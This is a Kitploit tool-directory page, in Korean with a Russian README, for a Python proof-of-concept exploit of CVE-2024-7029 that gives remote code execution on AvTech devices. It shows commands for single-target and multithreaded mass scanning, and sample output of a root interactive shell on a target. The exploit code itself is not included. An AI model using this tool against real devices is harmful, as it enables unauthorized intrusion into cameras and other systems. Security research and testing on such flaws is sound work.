Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-7029 — AvTech 장치에서 발견된 CVE-2024-7029 취약점에 대한 PoC 익스플로잇으로, Remote Code Execution (RCE)을 허용합니다. | Kitploit
도구/GitHubGitHub/geniuszly/cve-2024-7029
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubgeniuszly/cve-2024-7029

CVE-2024-7029

AvTech 장치에서 발견된 CVE-2024-7029 취약점에 대한 PoC 익스플로잇으로, Remote Code Execution (RCE)을 허용합니다.

저장소 보기
91년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

EN

GenAvTechRCEExploit CVE-2024-7029 취약점에 대한 PoC 익스플로잇으로, AvTech 장치에서 원격 코드 실행(RCE)을 가능하게 합니다. 이 도구는 취약한 장치를 스캔하고 상호 작용 방식으로 명령을 실행할 수 있습니다.

기능

  • 취약점 탐지: AvTech 장치가 RCE에 취약한지 확인합니다.
  • 대화형 셸: 대화형 셸을 통해 대상 장치에서 명령을 실행합니다.
  • 멀티스레드 스캐닝: 멀티스레딩을 사용하여 여러 대상을 동시에 스캔합니다.
  • 페이로드 실행: 특수 제작된 페이로드를 전송하여 원격으로 명령을 실행하도록 대상을 익스플로잇합니다.

요구 사항

  • Python 3.7+
  • requests 라이브러리
  • prompt_toolkit 라이브러리
  • alive_progress 라이브러리

필요한 라이브러리는 다음 명령으로 설치하세요:

root@kitploit:~
pip install -r requirements.txt

사용법

단일 대상 스캔

단일 대상의 취약점을 확인하고 대화형 셸을 시작하려면:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

<target_url>를 대상 장치의 실제 URL로 바꾸세요.

여러 대상 스캔

파일에 제공된 여러 대상을 스캔하려면(한 줄에 하나의 URL):

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

<file_path>를 대상 URL이 포함된 파일 경로로 바꾸세요.

스레드

-t 옵션으로 스캔에 사용할 스레드 수를 지정할 수 있습니다:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

기본 스레드 수는 10입니다.

예제

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20

RU

GenAvTechRCEExploit - эксплоит для CVE-2024-7029 в устройствах AvTech, позволяющая удаленное выполнение кода (RCE). Этот инструмент может сканировать уязвимые устройства и выполнять на них команды в интерактивном режиме.

Возможности

  • Поиск уязвимостей: Проверка устройств AvTech на уязвимость к RCE.
  • Интерактивная оболочка: Выполнение команд на целевом устройстве через интерактивную оболочку.
  • Многопоточное сканирование: Одновременное сканирование нескольких целей с использованием многопоточности.
  • Выполнение полезной нагрузки: Эксплуатация целей путем отправки специально сформированной полезной нагрузки для удаленного выполнения команд.

Требования

  • Python 3.7+
  • Библиотека requests
  • Библиотека prompt_toolkit
  • Библиотека alive_progress

Установить необходимые библиотеки можно с помощью:

root@kitploit:~
pip install -r requirements.txt

Использование

Сканирование одной цели

Для проверки уязвимости одной цели и запуска интерактивной оболочки:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

Замените <target_url> на реальный URL целевого устройства.

Сканирование нескольких целей

Для сканирования нескольких целей, указанных в файле (один URL на строку):

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

Замените <file_path> на путь к файлу, содержащему URL-адреса целей.

Потоки

Вы можете указать количество потоков для сканирования с помощью опции -t:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

По умолчанию количество потоков установлено на 10.

Пример

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
도구 다운로드